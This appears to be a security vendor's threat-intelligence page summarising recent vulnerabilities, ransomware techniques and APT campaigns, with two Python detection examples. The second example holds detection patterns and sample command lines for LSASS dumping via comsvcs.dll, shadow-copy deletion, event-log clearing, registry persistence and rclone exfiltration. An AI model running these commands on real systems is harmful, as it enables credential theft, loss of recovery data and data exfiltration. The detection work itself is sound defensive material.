The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as run exposure checks on your endpoint devices and servers, which can help identify a successful payload delivery and compromise through a reported vulnerability.

Intelligence Levels

  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness

About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports, hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles

Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

VMware Workspace ONE Access Vulnerabilities

May 03, 2022

Industry: N/A | Level: Tactical | Source: Morphisec

On April 14th and 15th, 2022, Morphisec identified the exploitation of vulnerabilities associated with VMware Workspace ONE Access. Of the three vulnerabilities that can result in remote code execution, CVE-2022-22954 is the most critical, as it does not require administrative access to the server, while CVE-2022-22957 and CVE-2022-22958 do. The vulnerability is lucrative to threat actors given the wide adoption of VMware and the large attack surface it presents: “Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation. Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons.” The tactics, techniques, and procedures observed in an attack chain for the vulnerability were identified as similar to those of Rocket Kitten, an Iran-based threat actor group. An observed exploit involved compromising the VMware Identity Manager service to deploy a PowerShell stager that downloads a PowerShell script, dubbed the PowerTrash loader, which pushes a Core Impact agent (developed by Core Security as part of a penetration testing framework) into memory.

  • Anvilogic Use Case: VMware ONE CVE-2022-22954

Log4Shell Vulnerability Vast & Abundant

May 03, 2022

Industry: N/A | Level: Tactical | Source: Rezilion

Since December 2021, the attack surface of the Log4Shell vulnerability has remained far-reaching. Research from Rezilion found that, four months on, the vulnerability is still present in many software products, and vulnerable versions continue to be downloaded and left unpatched. According to Sonatype’s “Log4j Download Dashboard”, downloads of vulnerable Log4j versions persist: as of April 26th, 2022, 35% (395,281) of downloads were of vulnerable versions. Further analysis identified that many Log4Shell-affected components remain unpatched: “When exploring the components affected by the Log4Shell vulnerability, i.e. components using org.apache.logging.log4j:log4j-core, it appears that out of a total of 17.84K affected packages, only 7.14K are patched for Log4Shell. This means that almost 60% of vulnerable packages are not yet patched!” Various factors could contribute to users continuing to download vulnerable versions, including lack of awareness of the vulnerability, inability to detect it, and the use of third-party software containing it. The need to detect and/or patch against Log4Shell remains crucial given the severity of the vulnerability and the ease of exploiting it. Threat groups reported to be attempting exploitation include HAFNIUM, APT35, Tunnel Vision, and APT41/Deep Panda.

  • Anvilogic Scenario: Common Log4Shell Payload
  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell
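The detection side of the Rezilion finding, as an added example that is neither Rezilion’s nor Anvilogic’s code: it scans `mvn dependency:list` style output for `org.apache.logging.log4j:log4j-core` and flags versions that predate the CVE-2021-44228 fix on their release branch. The sample dependency lines are constructed.

```python
import re

# First log4j-core release on each maintained branch that fixes CVE-2021-44228
# (Apache advisory: 2.15.0 for Java 8, 2.12.2 for Java 7, 2.3.1 for Java 6).
# Tuples carry a trailing 1 so that a pre-release (0) sorts below its final build.
FIXED_BY_BRANCH = {"2.3": (2, 3, 1, 1), "2.12": (2, 12, 2, 1)}
DEFAULT_FIXED = (2, 15, 0, 1)
LOG4J_CORE = r"(org\.apache\.logging\.log4j:log4j-core):(?:jar:)?([\w.\-]+)"

def parse_version(v):
    """'2.14.1' -> (2,14,1,1); '2.0-beta9' -> (2,0,0,0) so pre-releases sort lower."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([\w.]+))?", v.strip())
    if not m:
        raise ValueError(f"unparseable version: {v}")
    return (int(m[1]), int(m[2]), int(m[3] or 0), 0 if m[4] else 1)

def is_vulnerable_log4shell(version):
    """True if this log4j-core version predates the CVE-2021-44228 fix on its branch.
    Only 2.x is in scope; Log4j 1.x has separate advisories. Pre-2.0-beta9 builds are
    over-approximated as vulnerable, which is harmless for a 'needs upgrade' check."""
    v = parse_version(version)
    if v[0] != 2:
        return False
    fixed = FIXED_BY_BRANCH.get(f"{v[0]}.{v[1]}", DEFAULT_FIXED)
    return v < fixed

def scan_dependencies(lines):
    """Return 'group:artifact:version' for every vulnerable log4j-core coordinate."""
    hits = []
    for line in lines:
        m = re.search(LOG4J_CORE, line)
        if m and is_vulnerable_log4shell(m[2]):
            hits.append(f"{m[1]}:{m[2]}")
    return hits

# Constructed sample of `mvn dependency:list` output (not from a real project).
SAMPLE_DEPENDENCY_LIST = [
    "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.14.1:compile",
    "[INFO]    org.apache.logging.log4j:log4j-api:jar:2.14.1:compile",
    "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.12.2:compile",
    "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.17.1:compile",
    "[INFO]    com.example:legacy-app:jar:1.0:compile",
]

if __name__ == "__main__":
    print(scan_dependencies(SAMPLE_DEPENDENCY_LIST))
```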

Ransomware Attack Techniques

May 03, 2022

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of the ransomware groups Hive, Conti, and Avoslocker has identified frequently utilized tools, tactics, and procedures (TTPs). During the initial access stage of the attack, the ransomware operators leverage exploits, RDP with weak or compromised credentials, and malware deployment through phishing emails involving IcedID, Emotet, QakBot, or TrickBot. Persistence involved the use of third-party remote access software such as AnyDesk and ConnectWise Control, along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a vast array of techniques involving Mimikatz, comsvcs.dll, extracting credentials from the registry, and using Task Manager to dump LSASS memory. Tools used for lateral movement include PsExec, WMI, BITSAdmin, and Mimikatz. Tampering with Windows event logs helped cover the attackers’ tracks, and data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, the actors relied on RClone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution
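An added illustration of how atomic Threat Identifiers feed a sequence-based Threat Scenario for the TTPs above: the Python below runs simple command-line patterns for several of the listed use cases over constructed process-creation events and escalates a host only when several distinct identifiers fire. The patterns are this example’s own approximations, not Anvilogic’s detection content.

```python
import re
from collections import defaultdict

# Atomic Threat Identifiers: (use-case name, pattern over the lower-cased command line).
# Patterns are this example's own approximations, not Anvilogic's detection content.
IDENTIFIERS = [
    ("Registry key added with reg.exe", re.compile(r"\breg(\.exe)?\s+add\b")),
    ("comsvcs.dll Lsass Memory Dump", re.compile(r"comsvcs\.dll.*minidump")),
    ("BITSadmin Execution", re.compile(r"\bbitsadmin(\.exe)?\s+/transfer\b")),
    ("Clear Windows Event Logs", re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b")),
    ("Inhibit System Recovery Commands", re.compile(
        r"\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete"
        r"|\bwbadmin(\.exe)?\s+delete\s+catalog|\bbcdedit(\.exe)?\s.*recoveryenabled\s+no")),
    ("Rclone Execution", re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b")),
]

def match_identifiers(event):
    """Names of every Threat Identifier that fires on one process-creation event."""
    cmd = event["command_line"].lower()
    return [name for name, rx in IDENTIFIERS if rx.search(cmd)]

def threat_scenarios(events, min_distinct=3):
    """Sequence-based Threat Scenario: escalate a host on which at least
    `min_distinct` different identifiers fired, so a single noisy match
    (e.g. a lone reg add by an installer) does not page anyone on its own."""
    per_host = defaultdict(set)
    for ev in events:
        for name in match_identifiers(ev):
            per_host[ev["host"]].add(name)
    return {h: sorted(n) for h, n in per_host.items() if len(n) >= min_distinct}

# Constructed sample events (not real telemetry); WS01 shows a ransomware-style chain.
SAMPLE_EVENTS = [
    {"host": "WS01", "command_line": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v u /d C:\Users\Public\u.exe"},
    {"host": "WS01", "command_line": r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 1234 C:\Temp\out.dmp full"},
    {"host": "WS01", "command_line": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "command_line": "wevtutil.exe cl Security"},
    {"host": "WS02", "command_line": r"rclone.exe copy D:\share remote:bucket --transfers 8"},
    {"host": "WS03", "command_line": r"reg query HKLM\SYSTEM\CurrentControlSet\Services"},
]

if __name__ == "__main__":
    print(threat_scenarios(SAMPLE_EVENTS))
```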

APT37 Targeting Journalists and Researchers

May 03, 2022

Industry: Media | Level: Tactical | Source: Stairwell

NK News, an American news outlet reporting on activities in North Korea, identified suspicious spear-phishing emails as a threat campaign by the North Korean threat group APT37/Ricochet Chollima. The campaign appears to target journalists and researchers reporting on sensitive issues within the country. The news organization engaged Stairwell’s cybersecurity team in March 2022, leading to the discovery of a new malware named GOLDBACKDOOR. The threat group employs a multi-stage infection process to evade defenses. A compressed file attached to the suspicious email contains Windows LNK (shortcut) files. When the shortcut files are executed, PowerShell scripts launch, presenting a decoy document to distract the victim while downloading and executing malicious shellcode. The downloaded payload, Fantasy, then conducts process injection to deploy the GOLDBACKDOOR malware. GOLDBACKDOOR is a Windows Portable Executable (PE) file with a creation timestamp of February 9th, 2022, 02:38:30 UTC. As analyzed by Stairwell, “Embedded in the analyzed copy of GOLDBACKDOOR is a set of API keys used to authenticate against Azure and retrieve commands for execution. Received commands are prefixed with a single-character value, which denotes the corresponding task requested of the malware. GOLDBACKDOOR provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall.”

  • Anvilogic Scenario: APT37 – GOLDBACKDOOR – Initial Infection
  • Anvilogic Use Cases:
    • Compressed File Execution
    • Symbolic OR Hard File Link Created
    • Suspicious Executable by CMD.exe
    • Invoke-Expression Command
    • Rare Remote Thread

Red Canary’s Intelligence Insights

May 03, 2022

Industry: N/A | Level: Tactical | Source: RedCanary

Red Canary’s intelligence insights for threats observed during March 2022 identified a shift in rankings: SocGholish, previously the top threat, slipped to #8 on the list, and Impacket claimed the top spot. The top five threats (highest to lowest) are Impacket, Mimikatz, Yellow Cockatoo, Cobalt Strike, and BloodHound. Additionally, Emotet has risen to 6th (previously #8), and Qbot/Qakbot has dropped to 9th (previously #4). In April 2022, Qbot was observed adjusting its delivery techniques to incorporate Windows Installer (MSI) packages, where it previously relied on malicious Office macros and compressed zip files. Microsoft’s decision to block VBA macros by default, since January 2022, has caused threat actors to adjust.

  • Anvilogic Use Cases:
    • Suspicious Email Attachment
    • Compressed File Execution
    • MSIExec Install MSI File

Tricks from SocGholish and Zloader

May 03, 2022

In its latest report, Cybereason’s tracking of SocGholish and Zloader activity details the malware’s capabilities and infection tactics. SocGholish is named (partially) for its social engineering tactics, luring victims into drive-by downloads that are often themed as critical browser updates.

Austin Peay State University Ransomware Attack

May 03, 2022

Industry: Education | Level: Strategic | Source: TheRecord

A ransomware attack impacted Austin Peay State University on the afternoon of Wednesday, April 27th, 2022. The university’s official Twitter account told students to disconnect their devices from the university’s network: “We are under a ransomware attack. If your computer is connected to the APSU network, please disconnect IMMEDIATELY.” The incident is said to be “contained” by the university’s executive director, Bill Persinger. Studies are not expected to be disrupted, as classes have concluded and students are focusing on examinations. The ransomware group responsible for the attack has not been identified.

Kaspersky Releases Decryptor for Yanluowang Ransomware

April 26, 2022

Industry: N/A | Level: Strategic | Source: Securelist

Kaspersky has identified a vulnerability in Yanluowang ransomware and provided a free decryptor for the malware. Yanluowang is a relatively new strain of ransomware, first observed in August 2021. The ransomware has targeted victims in the United States, Brazil, Turkey, and other countries. Few victims have come forward, and the victim count is suspected to be low due to the targeted nature of the ransomware group’s campaigns. As shared by Kaspersky, based on publicly collected information, “it is only used in targeted attacks rather than in other RaaS families. Yanluowang itself needs parameters to be executed in the system, meaning it will be executed either manually or through a combination of scripts in the compromised system.”

Impact of Conti Ransomware on the Healthcare Industry

April 26, 2022

Industry: Healthcare | Level: Strategic | Source: Krebs On Security

The impact of Conti and Ryuk ransomware on the healthcare industry has been substantial. As reported by Brian Krebs, findings from Errol Weiss, chief security officer of the Health Information Sharing & Analysis Center (H-ISAC), declare that the impact of ransomware on hospitals has been dangerous, causing disruptions to IT systems and the cancellation or delay of patient care services. In addition, given the nature of ransomware, the cost of incidents has been significant, requiring payment, incident analysis, and remediation of impacted systems. As identified by Ireland’s Health Service Executive, a ransomware incident that occurred in May 2021 amassed over $600 million in recovery costs. Ryuk/Conti has seen this sector as a prime target, and since 2020 the threat actors have compromised more than 400 healthcare facilities. Figures for ransomware against the healthcare industry have not been reliably reported, and the problem is likely underreported, given that companies would prefer to keep breaches confidential and avoid public attention.